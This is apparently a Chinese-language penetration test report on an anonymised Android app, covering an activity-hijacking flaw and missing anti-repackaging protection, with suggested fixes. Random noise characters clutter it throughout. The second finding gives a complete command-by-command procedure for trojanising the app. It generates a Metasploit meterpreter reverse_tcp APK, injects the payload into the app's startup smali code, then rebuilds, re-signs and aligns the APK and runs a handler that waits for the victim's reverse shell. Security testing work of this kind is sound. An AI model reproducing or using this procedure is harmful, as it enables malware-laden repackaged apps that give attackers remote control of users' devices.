: r, P; U$ p8 f2 n b; |7 p - z5 C6 `0 H3 a) @, g7 ?6 \1 W3 ~
& l9 ]5 k9 `/ t/ ?- v' G$ _
表1-2 测试结果 ; u' T- Z* a* \- j/ n
8 z+ p* Y; n/ F( [
; C! A8 {5 s" ~4 f
2 `( }- a5 d7 k( I7 ?
0 o* {; b& F! n' A/ T5 x, b; e6 C3 d1 H1 F6 i' @
. C) s) u/ E6 f5 J- A6 d
" y: N5 e! L+ u8 R, K7 u6 ~
3 ^; L6 l; Z+ D+ B; o& M, k5 H4 Z2 E: d
1 F- Y; r2 ~4 Q* s2 m9 l
. w) ? V( t6 v+ v2 T) B 2 检测结果 2 c+ j/ ]; s t
8 t% ~. H k, X% T+ j( T9 X- X
" [+ c. t R L, B% z+ J0 B' K! L" q+ {9 M
. z) y* A+ @- g9 }& b
) ?. A; E8 v! v0 I( I 2.1 某某某
; c# t" s4 E6 u/ Q2 M; n7 G) K: u& ~$ @7 l5 X
5 c; `' @ h( T9 `2 f0 |
& F) g1 |; X$ i( l f3 C 5 D/ h5 v$ O' m- w! G1 l& |: \
7 A* L. i- }, U4 i* B" M2 v- z4 o# _
2.1.1检测目标 , K& }2 m/ i) D) F4 [
% b+ Q/ m# l: A8 |: C , \' {1 p- [0 u, I
6 v0 }5 p: @7 Y2 [ # h) Z, L' t* k+ p
- [7 y/ w: V; m ~1 h* A. Z
目标地址: 某某某某某某APP 0 z: H* d" p1 R) ^
; h4 U$ S) ?7 e! p0 d4 J " h% V" j: R3 q8 _, v
7 `& g- C2 D8 t9 @9 `+ j7 o8 A
+ W2 R: A# b2 i- y+ x. ]& T3 L4 H4 g6 e L, Q
2.1.2检测结果 ' `* w5 a6 n5 H' j4 z
6 C3 G' i. M9 n9 S; ?3 G
^8 F9 B2 `; F0 j" n; F
; @8 i0 K& x7 E. _' u. M
; D' h0 w/ H+ e) E$ a$ A! e6 |, j I O0 g0 j
2.1.2.1
- @. I$ g" V+ |3 d* _5 g/ H4 d# U+ `( k7 m# J- o3 {" g2 T
/ c1 @ s& `0 X! s
' M& O5 q2 d8 ]
3 `2 C" \1 W$ h9 v
( e5 o: k6 X4 L$ _8 e
漏洞链接地址:某某某某某某APP 0 f1 A4 @; h9 R& r
) P- K- W5 h. a 6 p! {4 q, `2 Z: }) ]3 H3 J
) @) G* i( c6 X3 E. E
- O& b6 \; ?6 K* c% {. \# U' I/ h$ h8 M2 G; i) M4 i
8 H2 X- m$ Z/ m
6 {3 h" i6 C6 y$ d1 ]# ^
. |, d! n, I( f6 u P/ r' e
* b0 w1 ^6 X: F6 o9 c" l& Q0 [ , ]& G. G2 _/ Q$ N
9 ?, d+ v, M9 t @( k9 q
漏洞分析及取证: 3 @9 G4 R9 k+ Y; Z6 Y0 ~ B" o) q
. X: [% Z5 S, ~4 w0 ~& {. U
* \$ W% m8 |' t, S+ r) o6 r# l4 W/ _& V4 ]
9 e6 {( g- \( d
3 g8 ?3 r8 M7 v9 e6 ]: @7 b' p( \ 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
3 g. \0 c% V" ^' G7 Y4 Y8 j/ o& l, E v# t- `
) k* D( j$ [7 Q7 B, O% S, }% g
( R3 Z% ~0 M: u& W- B; b
, w; ?6 f$ c& K, k+ Z
* O8 h' Y) z+ b: J, J 6 {2 r7 n" |& q
( Q6 f6 B9 z/ @; S! L% O
- {, p1 q6 b- ^
, l2 R, ^5 I2 G % d5 F/ Z( U3 {" O- x: C
* c6 E" |7 Z. s3 \2 x9 N6 c; x
" f3 j2 T( u) a, E/ ^# M2 H2 }+ f; b+ k* _8 Q
^ A, E, V# h d5 `, d" W
0 q$ w% |/ R; e) W
5 v+ v" p% O% |9 ~: l. n# Q2 Q: v& M2 r$ F% j5 C
6 A& I! Z/ S+ J e+ l
4 m2 E8 H% I1 `) h
0 i- @) X4 v2 d2 A& u D1 f
4 P/ q% }+ e# k ' a& N( Q8 G+ H* C; r
2 W" @3 l* z3 Z- d# R5 b+ X+ j $ p9 m0 u* e' ~; D/ s
& Q8 f0 z! N' F3 o- h5 o9 P0 t / |+ y! [; R6 ^8 |0 \. j
# }+ u7 q5 N- z% i5 S , J6 f- H. p& p+ S# e! D
& Y. R2 }: P; {! x' O1 i; _3 d 3 S: j- r$ h7 ~7 r" ^- C) o [& P
; f V) l) z% B) E+ s% K6 }: J$ q: e+ Q1 u
; I8 M" A, D1 Z0 ?2 S/ ~
P* K$ u! C* f2 N6 b' Q+ s9 w& o7 g
& `. s. H$ ~2 a. }' f! ^) Z& B. f$ \5 h# o' l$ n+ I8 S$ q
漏洞危害:高 * G) y* |$ Z# E& J2 a$ }9 l
# g2 x, I4 v, S9 J! g # s' ?# D# m/ P% x# j: i, `
* ]; t2 j5 ~% O( A8 z
& m O# e* R4 O7 w4 b' V1 `( L! j; f4 a8 ]/ ]$ m8 W
6 y( O$ S7 l+ \+ h) B2 x% N: p. h/ T
& d7 K' K% B% ?2 M# ~
4 K e2 [) K X# ]6 U- R v
$ n8 C3 k, V4 R& o* v# x1 m0 ] 6 c/ P# @ S9 g3 ]" S' Q
0 _& X* m( a _8 T: P
- r. Z9 g9 n( j3 | h" _: i4 V0 ^& D: T, C9 v* L5 c
' L* q/ d1 J; f' U: \2 [9 T( Q
3 x+ _2 k) L5 ]
严重程度
$ {8 u! s- f' L! c( o. C
7 V5 o. O( N- P( W4 m8 z, q! {
7 i, b% W( G' B& e0 W+ |) t% M
$ y' L- M) P; t, @: x |
% _4 }' `& y) h# c8 i, C6 U& g7 D$ K- T
# `* a! u3 O& ? r8 f, i# K
7 f1 p6 f4 [8 b! c9 c
$ m& a* H& \6 v! @( M
: g( S9 Q5 A& L; |3 ~
高 / X1 G% m8 n2 j
; r9 K9 _8 k- _; H1 E5 T8 V
5 x. e) I1 o* G3 }( g. T) }
; D7 ~; \1 }9 I" N- \- {
| " P0 v, q" p& g$ J6 E. L
. t4 D. T- Z/ ~5 H1 }" S- n9 O
1 W2 C; s' T3 E5 X2 U" V; P
2 `) m3 o; t, H E/ n/ a$ M7 R Z 2 O) H6 i l3 ~% J: \5 i: v- s
/ ]1 n7 B( F% C ■
6 F1 w" `% { g% j: G
* h$ A# v/ X1 ?% B* j# M8 s
4 C9 V+ u) W4 V( B) W
, K: y/ v ~5 u/ ~, |) S- E% I# g/ L | % h) F% t- L. s% H+ a
: X% K9 l( w- @
+ \ _# V# K5 R% M- R, W" y9 y3 r: C: |% c s8 C6 H' Q" L
5 P- R% I+ x. c3 F1 U2 D3 @; T. L+ `. s0 Y# F
中
3 Q/ z" s3 X. Q. G- ^1 L8 h/ e4 P4 b) L* {5 ]3 R
- r: X4 E5 G1 v- i
/ a( U4 N- H& w* D! a* H1 `3 O+ C
|
- m2 c' `2 ^0 a4 N& X9 O. ^- i; Y! U8 N: B7 T; ]' q$ r8 _
! f& n; L9 g9 D" R% r& f; {
. Z5 h6 i3 j# K3 m, h
8 b; V7 h R6 T" a8 ~5 l9 X! ?; M5 B* ^# {3 N
1 [. n2 g6 D% P8 v, a$ q: c) h! }
Z; o- _% ?/ p: L F 7 x/ e7 |0 t5 ^" b
! N7 C. h5 @& ~9 f |
% S" l( u( @" |2 }) R8 b" H. `' O+ U4 l; M. W
/ W8 ~* Q5 e- G( a d
9 f0 | E% k- k# p( b: @
1 P( b! y( o( m! y5 J+ e. [
+ e$ s8 R1 z7 [$ v: w3 J 低
/ k7 |5 e% Q" T6 _! K; i4 t9 R; g, S
9 E7 K: O1 ^$ _% V5 P7 K
7 S' O" G' p3 I- j9 D. ~5 w5 } | 3 C, j3 l9 ~5 b L, I' X
+ x6 F& I. G: A, n # P$ Z% H. \0 ]$ R. i
! m, f1 X# V& Y3 N) y 7 L3 \ n# H- J8 |
, n: A0 c7 h5 b! W4 \8 l
, C4 b$ k# b& y. R
' Q7 a5 b+ x& b/ `9 D
5 \! L9 l0 z s; ~; ]( I! ^ G- Q% x' @- `; F* ?; ~) ]# r
|
7 h; w1 Z* G# y: [( g
3 i1 l1 I. U4 O2 H8 F" E# b$ _ H- t9 j
5 z8 R# N' D9 ~! N& ]6 ]
4 H, l/ @2 \7 M4 f/ j, L U _
- I8 \* I: b& J+ i( S, W3 J# q1 j9 F1 ]% F, k
, r, b! h9 h; U$ m
% D' h' J: N: B; r+ d' `
! U& i& K/ `( E' b7 _
2 h" E- B- c: F
8 _/ K& y$ L) o' L" G; V& P4 M+ X* e |
# W x. t* O9 ?, l
/ j2 e! O! f1 P! r
# D ?/ i1 ]4 s+ N& @% d 1 o# R3 M2 M$ [+ _
. v. ]3 N, C* |& ?0 B
7 g6 u. Z) m$ F9 \* m1 N3 U3 x
" W8 a( ?& r/ Z; {5 u' f 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
5 M# X+ Z0 H/ C' J6 `$ c
y- R- a5 Z2 P1 \7 W% O9 H - U3 X9 K# F, W3 ~# P
% N3 m4 g- _; U% V& z( _4 A4 \4 E: s
4 ], d. s y0 I/ \' E
$ s- E) r' [ ]- u9 w
! U: Z3 a6 ^ ~5 g2 C3 K0 ^, ^
. o, X$ n+ f" v1 U4 C& J
6 u6 D# W1 h; [- u5 i! v [( |5 V: g+ h9 @ }. `/ f
6 l7 r! T# }7 } N2 ?
9 D- K. M3 C1 x1 T1 W9 E: f
( w o$ b* W, X. g4 P
; d! Y- Z( f% {9 | - j3 Z) Y$ l) o7 \ o
7 |* z2 k7 v4 ^% [( v
: a: J. i( D+ B7 q
. J. m* _& ?6 F$ x+ \, }# E2 o/ z
2.1.2.2
3 ]: V0 |0 Y: F; {6 z: X
0 W) a, t( r" o2 g0 Y4 x1 g
3 y' C: }& B$ P8 d: Q; R
/ R) b! I- g% T4 X. u 0 I; l% \+ n; A2 Q4 x2 i" B$ X, H
+ W* s; q" Q9 `
漏洞链接地址:某某某某某某APP
. ?/ y' [- u7 N0 }2 a) Y- i0 A
. g- Y$ n5 T; Y( I
0 ] {- j0 F) D- ^; T- r& R9 J" m; j- g) h7 E0 F' _# i4 q
& v, D! c( Q7 r* N! e( |8 E
1 o! ~5 w, r( ]) Z/ f 漏洞分析及取证: 0 c X2 ^/ _# L6 q$ {
* o0 N9 v+ z1 T9 S3 v( ~ - _' S- h; M* Y7 C8 D6 Z
6 a5 j: O7 G2 n. Z
1 M B# a- }. k+ ^# \7 f4 K1 r6 c7 y! A
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ; G. Z# m: \" M) l) y
0 s# {& P( @" p
5 s' J! s5 M, X9 T9 C5 d# y: q9 F
3 ~8 c" P: @1 C+ Q , L' |) A8 ` F( M( I5 y
2 M9 L0 T F, \ 用Metasploit 生成木马 apk % T, b/ b8 }- T2 q6 }% l! p
% X8 d, \! o$ a6 b1 J; ]
8 [. D6 P* |1 ?& Y/ e# z( [& V
- ]! j, z# u0 L
( Y* a3 h8 i e5 g: E) w) \9 Q; I" [. N
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk * f6 M, \3 S; t8 F! J2 q
+ [1 d: @: e" S' \2 x( x
2 M5 H6 Q% ~1 ~
, _3 R \, l) `3 d* k
k& x/ S0 ]8 |9 H5 j6 L6 }) f
0 D8 Y' [, `# D5 _
反编译目标apk和木马apk ' o+ g; \0 e- Y) F" A
5 W0 c3 p7 M* S
* Q3 q5 N# Q2 p) o z+ p
6 S; C4 Z0 m! ?; I: {( o2 Y+ d" T6 u2 B 1 d0 m0 a- L' A+ s- _) q+ `
, K1 h @$ g! K6 b apktool d target.apk : g# O4 I6 K3 p5 A( j+ q
3 K* N, h1 u$ H5 m: I+ }2 } apktool d cockhorse.apk # k: {1 c/ U- a0 }. I. S) B/ `
$ `8 w; Y2 N" q V& D9 X
$ g: ~+ i) [) F9 O- Z+ i4 S# p
/ h2 i5 ]9 G3 b" c( T# |4 u
8 |7 f1 o ]: [% @5 `# C4 \! T" s/ c3 T. M- i0 G; ?
木马 apk 注入目标 apk + t7 ?3 W* S' k t9 \! x
) m4 |* R2 v3 Z8 [7 z
; M" v4 ?' c* x7 O1 I
( H" z+ h( I" g' ^2 i2 Y/ ` 8 }% Z4 x; n6 @1 |& r3 f! Z
# {4 k3 t2 I0 ]" A 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码: 1 x2 r& @0 z& Z. a# u
" W' r1 h- p }( ?/ N# b# k2 c9 ]
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
$ U: i3 E" J7 B z) l7 ^* |/ }1 D( Q# a/ O! q5 d* D7 _
7 ~& W/ N! |. e6 \
6 g$ W3 h5 i$ N$ l/ Z4 K * V* c1 a* v# s
2 Q" Z$ s# p! f% u! D X f
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
- `8 l. z( T3 r9 H$ x" R
: F: d' k$ R* g5 b( A
" E; f5 @6 }% A; Q+ W# g
3 z( H5 O; r, R' X( m
: m6 G% ?/ X' M0 |/ r1 M( d6 X9 W T! ~
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
; b) y0 m1 M! V8 k: ?% i8 n* \7 X Y" E! U; T3 u* h
8 D% r+ @4 C3 t( z6 b1 e+ X$ G
- V" s: q( ~9 n/ z
+ \: t5 u1 J" [! F1 D" [" U
% ^/ Z r$ U7 g. V; c. ?& m# ^3 { y 回编译生成最终 apk : [* N u6 @% z8 U" N6 ^$ l6 {0 Z
1 y5 z) p5 w/ f( o0 x' f
, b, ?4 x- Q( _2 S8 J, F7 x% E2 ]" i9 c4 ^! I1 J3 u
5 ?5 j# l, [" X! ?1 `# _- {$ C: y' Y P: f) z+ H3 k# q4 b; K, B
重新打包
) N' W& Q( C. x
1 d z: _: G, M8 ]8 d! X
( I5 d4 m, D j3 L* P0 E7 A
" B" [9 R" {$ R v
' u# B- s! j0 m0 |/ [+ f
5 V. U [ B* N1 U apktool b -o repackage.apk target_app_floder
2 J8 F3 g8 W4 O0 e2 b1 ]) e2 C
+ G5 v6 B. X% |
3 b: }# I9 r% ?9 G7 m# p$ a& a9 p% E# B1 z j( A
) ~! c3 m6 w2 Z6 N8 z) l# j0 {
6 \8 S" E2 T6 s/ Q 创建签名文件,有的话可忽略此步骤
5 y0 r" s: `5 ~- {' @8 a, I9 \6 U8 k
, s" B, c+ P) t! e" u1 w
6 [8 N9 q& }# }9 {5 Q2 v: N
; N1 d: X1 T. j- G
# w' S6 p# J3 ?/ C; k% Z keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
5 A/ D2 n, e0 X3 U! L4 B! {9 B; ?2 A1 Q. f; \5 @3 `% \7 y
( r! U+ u: e8 o3 ^
4 E9 c7 F$ D4 M# b; f% k
5 ]1 f5 T A/ V9 A
' P$ j% z; x1 N0 @' I; |+ { 签名,以下任选其一
- [% _, M% H: y* c/ r8 R# t; D+ E6 I% e3 u8 N
4 F. D, o: |& R1 |7 Q. ^: n
/ e" I" p0 f7 ~5 @3 c 5 l9 j8 z) l3 e5 p' U+ w/ {$ u/ ^- ^% ?
6 o3 O# @' d7 B9 ^ jarsigner 方式 3 @ G, M# X, U/ l3 q: s: U: c
: N i) g; C. \: Y
# R" n, g1 L3 Z" i
! b) n1 Y% I8 G
1 i, Q- {5 j+ ^8 u+ |
. [- U; n% P3 q, T
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
7 N9 I: X5 E4 k- x. d5 D; P+ H6 s4 h
2 O/ G& R2 `! l" j4 w1 ^3 J/ @
! a9 z1 S8 t0 ]# h6 {
& O0 C/ G2 X: ~
" R$ s+ r5 F6 A4 j5 e8 X( G( d; i( j1 x. c9 N% @
apksigner 方式 , d6 r1 S, g* S
$ r# b5 }$ Q y$ R% n
- M2 M9 m9 w4 F+ W# P3 D% x
' W7 T1 r& g, G5 a
6 y% u$ \7 b$ X& }- B6 q. e3 [; y1 j" \
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 0 X$ \4 o/ y8 E3 ?' g* K; _4 j+ p; c8 H
: ~. s; e' N6 I3 e( N& [2 f 6 D* a; S) G, f L; @: Y
) g8 B A; p: X $ N6 H% c( _) v7 j9 \
" A( }" C; c- k" K) V, E 如需要禁用 v2签名 添加选项--v2-signing-enabled false
! @4 |, U3 A& K" ~, \1 T% t0 r6 e2 }) g
! O. R6 R3 o* `) V& e1 a2 x
) \9 P' c' g) k/ d2 [ + a S' B0 {% o8 P; {
5 a6 |1 u; J6 n5 i( o4 |
验证,以下任选其一
( B" T4 F3 A5 d. M. K2 ?5 i$ e. c" r6 T; y( J
7 f: Q, j$ @2 N" r+ l2 u; \! M9 r
+ I5 k# a# o. t; L
! n9 r1 T$ ]/ ?4 ?2 r( V/ d, s) i
# N- J* A- u: D% {0 R" ]; c1 ^ jarsigner方式
+ J2 h7 L. B$ g# d" L* ?/ E( w, p
/ Q- r* x4 ~7 u7 t( p- P
V- s2 C: }' z: H% f: j W6 ^* W' y% |- h0 v
5 G. I5 V, N& C" T4 u$ }; n, {: P/ }+ g9 R
jarsigner -verify repackaged.apk 3 Q2 x7 b# q0 b8 N' p' _
9 R8 _3 f' j2 \1 e% g4 n5 n4 @ $ S$ c2 F( D; ?4 |! ]
: a! e# ^9 d; ]4 l( U9 Z 0 T+ Y1 b( G g) b8 B& n' H/ z
0 j+ f0 G% p7 V6 L
apksigner 方式 & X; t( g8 _7 M& N6 N
/ q) W, O& j; @5 E
# t; C8 o$ J Z$ n2 ]) t6 ~/ Y$ x
! }3 l: b) [+ e( D / j8 X9 _9 K. W3 _
' U/ ~' Z5 g3 P apksigner verify -v --print-certs repackaged.apk
" S/ V7 Z5 _' ?/ f4 J4 E+ D/ o, a+ c; }4 ~' V5 p
+ z! [% @0 ?8 h* g0 i7 H% ]1 y6 p5 X3 g& Y8 y" }3 s
. l9 U& D5 z3 z' O
& Y7 ]/ Z' w- Y! I( C
keytool方式 / D" t9 e5 u" e2 ^' ]( z; C9 h
7 v6 ]' \( f0 m% ~- y* q& T$ N
' T, b9 z) F3 A" c( E
: j3 P& ~* ?# |, ~4 s6 J, z
" N9 v2 R9 ?5 w4 R* f) ]1 U& n- K' M1 z1 T5 k
keytool -printcert -jarfile repackaged.apk
( a6 ]4 ?, k' a+ F4 R- n5 C1 [2 w1 x8 W9 i
8 X4 w$ y" i* ]
; }" d" Y- W4 w( ?& d% ^. E. A 1 Q- k/ l1 e, b" e# i0 I. E2 B) p
% o# N, Z7 J" V2 w# P0 Q 对齐
' y: k0 ^7 ~ y' v4 v, l( W& j; \! R; j+ p1 U5 w8 b4 a/ n
( P Z4 M; C- _) ^. R! t( u. M" W/ B* z( X' k# N# }5 u
: j. ?+ q c |" ]: q
3 H1 K0 U: M) f/ r6 n 字节对齐优化
. W! X7 i! N) V2 m% Z# I* J r$ B
: _ r9 V' z7 c9 ^* ?
y$ R2 t* N j; b$ q" L+ p ?% ^+ u3 k5 g7 i0 G8 e' M: E7 B5 e2 v
/ Q3 y6 A& x3 P, n! n2 e& S$ \# a( h1 n7 B P: N2 R9 N
zipalign -v 4 repackaged.apk final.apk 3 C! o- u( W) Q
* `, a1 R2 e8 h2 u; Y ( p$ N( E, F w: D6 R5 B
5 M# K! d$ x) R* e
; [4 T7 f& l( X- l! _% O+ V7 h7 f2 x' }3 _. C; s& y$ K
检查是否对齐
4 S- v/ r4 |1 a) ]' f K, r! j7 m% C5 [% I7 J6 @+ N3 K$ [
3 e7 {3 {! ^, A9 _
0 m6 |3 ~9 a7 j* [0 p
6 _$ X8 e1 f |9 ]' q! y7 [
0 r9 ^. _, Z/ I/ x% } zipalign -c -v 4 final.apk / r2 V( r/ J! c* {5 d
. m) }9 n4 c3 P6 |0 H5 u
3 @9 [: ]$ Z( P& c5 a7 W6 }; D/ i% Y' q/ O( a) e# g
- w9 t! B2 j, e; G& e- i+ H2 D! j* e
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
/ h8 Y' b) m( e4 K& ], `
2 H" @: D! G3 ~- e% \+ D0 K * ~# c) a8 C6 s& I
6 j# U6 I% J8 \" S) X
9 B/ q' I( c& Z# _
v4 D8 Y' U% f4 _: ~- a/ A 启动Metasploit控制台,配置参数等待上线 4 X0 c, H# X/ a2 b
1 Y; |2 ?/ Z% H, R/ I0 n" l
3 p- S/ t" C2 W* D7 X/ l) s+ I/ E* Z/ K+ O
3 {8 L; ~8 i/ G+ l! I$ ]! M
6 t6 V' G: X9 ]5 `& B
在终端依次输入如下命令
* a/ M( i2 Q, N1 B# r
( a9 L( S3 A, U6 G 3 L( F, o, Y1 V8 S4 z6 n; |
2 E; H1 |% j0 ?; c, d
# J! o# q( p1 V
0 I; D1 ~% o# M) k
msfconsole % \4 T) K) Z- i" t
* Q5 \ e. [1 u2 i; ?" c * m; K, ]2 v( L7 v+ N# G
4 g. p3 G- @$ ?2 |6 t+ d
" ` h. u; I: ]: H) d2 `; c" L6 q, g* ~; f6 k- O' W4 r# x
use exploit/multi/handler
! {' }! `/ `4 ?0 t2 L2 N+ D, o9 s2 N5 e; Y
: S8 g- u' P. ?) q1 o
4 n7 N7 n, o( V2 g' C' Y
+ g+ m. {$ O* a: V" @, l$ N
+ C- O: f' W/ u" J- ~" j set PAYLOAD android/meterpreter/reverse_tcp
5 ]! z! A; e" m5 Q% D' [/ ^/ {
% i2 p: N0 i/ n+ l8 ^/ x1 U- p2 n) {4 V6 v2 r0 o g
2 c4 n4 [* i, w2 O& q$ }; y
: N( ^% W1 z. c5 K8 g2 ^9 k set LHOST 192.xxx.xx.xx
! h0 l8 F# b" Z) _( ?
" a: g% d4 T* z ! T: C# J" F9 D
# q% q( |0 Y% M7 y; G# z6 O
0 @. ~4 n" |8 Q6 T+ w1 x# j3 _9 B, k
- c% ^2 x# T0 A \6 R set LPORT 4444
0 ]- h: L9 M# {- t) C5 W' S& p; f: K% p z
6 L3 o- p% ?" u& C
' ^2 z8 C, ?8 S0 F% Z # d, T$ k5 m9 m L: m; d+ D, ~
4 J* h4 C5 G+ S9 L exploit 3 X4 J2 M" a2 ~; ^( P
& `# L8 |2 z& o$ C: D1 d, H
, D, l2 b$ j- u0 m% q) B
; Q+ d, x* h0 j! N; h9 u. h
. a, n4 k( \: ~ `4 }2 P6 ~0 G j' K a: O
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
3 t( ~- u7 K3 u9 X8 a
# ~- J8 g' k9 x5 d3 l % [" x0 Z+ u9 U2 A/ D) N
% N" V. D- a0 K* w6 H
; T; c2 B: n+ E0 W" k0 E. R
, Z1 M6 x$ `2 [ 漏洞危害:中
! @& d7 q% b* S2 n5 r9 o
" C+ H {6 n6 C6 Z 8 P+ R9 Z n4 \8 @4 e$ ] S
: k) ~7 F! R0 w+ Z* e 4 W1 {: N+ I; G! J$ q2 L; y
" X/ R4 @5 |/ |8 k, | : z$ J2 [- I! f
$ p1 W$ i3 z2 O# S
1 N* A/ x3 X) d1 [
+ a0 v) I2 N; Q& w' a* j$ ]
, } y; j/ l, J! J
# [- K+ X: _- M! F K8 ]" G) y) Q3 j, k. z3 F3 P, x2 E
! }& k0 ?& Z0 U* c/ q # `8 h5 s7 P8 j( m, w
, M. m: Q- _" B' P4 ?
2 c& ?& [3 E; p9 ~6 p
# C- |& x$ u3 S 严重程度 3 ?' X6 V9 X8 q# H
. [* q9 s! F) u0 k ]6 l/ x - d. `) R% \0 m: D* f3 ^5 H
/ i* x, o! ?2 N- Z5 ^" b
|
5 j! I6 ]; A! N6 N6 q
4 U$ X8 P& N- a9 t7 v ( N6 e# _5 Z$ u* E& e- Q
( `+ F6 b m0 H0 [" X
m+ v$ Q, v9 ]! [( v: R* k. p$ N; c0 s6 Z5 b
高
" `' z( K$ p' |) B7 J) }4 }/ j n1 P4 B7 e/ c' U1 k9 F# l
0 v6 ?9 I& ^ T" b; D" {
0 E Q/ t9 v8 T6 L, F6 t0 k! O | 7 [4 W5 \) r8 L, B' m. [! i
3 W8 i9 z( \* Y, f
/ A" Q4 a- b; l
$ z7 G. C; E- u- Z7 F0 C
' D) l) `- }/ b4 O. C
- R6 f/ V$ @" s! I ■
& k7 Q* g# _! K3 a3 d+ ^3 R1 L& t6 W4 b+ f5 I
- f& {) I/ Q6 S7 l! r3 z- g
) s8 q3 P# L& d7 i
|
6 W9 y! ]- {& N) h
9 V" S3 |* p/ c6 ^ ) S( v7 O+ W+ c5 c( r3 o
6 q( F, p; @7 a D @; y
7 E( _2 E/ @ ~
& j! Q4 p' @0 I" U 中 " l6 R# a( G7 H2 q
8 M" Y* v! F4 ?! s& j
: `: b2 N I1 X- {6 b3 X
+ `8 v- W9 w$ D: J% A: B
|
) X2 Q+ e* T5 p& J5 s' ^; y5 G# T6 e
3 {0 V3 O( A8 I( i4 R
$ ?/ r6 y8 _6 j) G' ^
3 z2 r# S2 v7 D9 X! I% C' ^$ x1 T7 O4 S1 a
! Z0 ]' c/ c6 X D
! ?9 D, v; M( b) U& b
0 K. C' P% I2 M9 d- y
* w6 y# @4 T# ~ d- E+ s2 \
: L7 G$ y5 K! c- u3 ~. G+ s/ v
; k# p. e# L; I | ) D/ h9 g4 K. d6 w/ @
3 B* T* n- q( l9 a5 ^
: R+ J2 k) G- D E* d$ v) m2 d% @3 u9 M K4 N5 }/ M$ L! ]
2 S: S, \4 ]" T
7 m* W% u: l3 ?& K 低 5 h5 C2 t4 e& N( X" D
( |+ W4 }7 u/ C
8 V6 o B, E, _' o7 @. K9 X' q$ P& {
|
! s% f# }0 _2 i% f# V8 \* R! V! ?
, Y7 W4 G1 i! `$ ^, D0 e
2 z2 |0 i4 L% ^5 l
6 V6 R( Z* A! X P# a. M- g 8 B* L: ^4 ^5 o; Z3 P8 a
L8 }# `5 t+ v1 E D+ b/ { ! j3 m; W! a5 ?2 ?4 i, {* f
" l7 {6 A& [5 K& E
& h; w# a* ?5 f0 c! H
, u. x/ ^# {0 Q3 Z3 E# U- Q* q( ~
+ p4 Q, X# F" V" D1 N7 X+ z( f8 ?; H
|
8 t2 T* Q4 W* D) p# k+ @5 [& |5 E4 B/ A; z/ H
( h# E4 [) d2 B1 E5 B3 K$ v
- C1 L, K& ]- j; V. x; _6 V * M* B; W1 i0 X5 q) l: A! h
1 I! m# E) y2 r5 ^
3 V5 x" r# A; d0 [0 s: u3 |2 \7 e8 j9 C: O. H
! T$ Z [3 @( \0 L# d( u5 q1 t2 X/ j; K
Q A9 {6 n0 l+ _! k- d
, |; ~$ `7 l7 G& @$ h( O
R, ~6 z1 x7 R" O, L' o/ `
5 z% K6 L' }, h9 u6 s / r! g. u7 Q' d8 O, P, B
& m G, Z7 v) C9 {+ H% z
: K$ Q8 k" T- ]$ j) V" L* k. q7 @$ O, I- M) F
修复方法: / S6 x; i0 G4 J& w* R% D
0 U; T3 K& u5 j7 l3 u
/ N4 e! c+ `: h8 ]2 {4 a8 s/ g, v4 H. K/ [; k6 f: i
0 r M$ m. K3 i/ @
& m& `. G; E& j$ V& L 1.在 APP 启动时应做签名校验防止二次打包。
4 U7 z w/ \* G; ^
8 {$ \& m5 B- G; q 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 5 M+ \; P- c# j6 X9 |) Z- w W
+ O5 Z3 r1 U' F
! E3 E% {- m/ a. W
+ Z' ~4 ~) c. ]1 ~ 8 n& Z9 j- |* Q+ S2 l2 m2 T3 G
& L4 O+ w9 X0 N& c+ T7 W& b. D
U' j7 @' b2 [) D
7 u8 a$ J, V& @
& y% \ C. F" {+ `& Z/ T
3 k! o5 |% D. C" J+ Y
1 ~! l' X( S6 }( j& Y
6 [# g: w) b# X. \# p) p 9 X% l0 t# g& L; D" I) m* R
i& y, X. o+ g6 E1 Y- l3 V# L
1 i. f X+ }$ W: o% _6 z1 T6 `( e) y3 _1 [5 M" X0 v' a* @
+ ?& F. P# S4 f9 Q
7 M% O' _' L# h. X
9 b& K, P5 T d( E* {1 T3 U( |8 G
' {5 N; c0 X9 W
|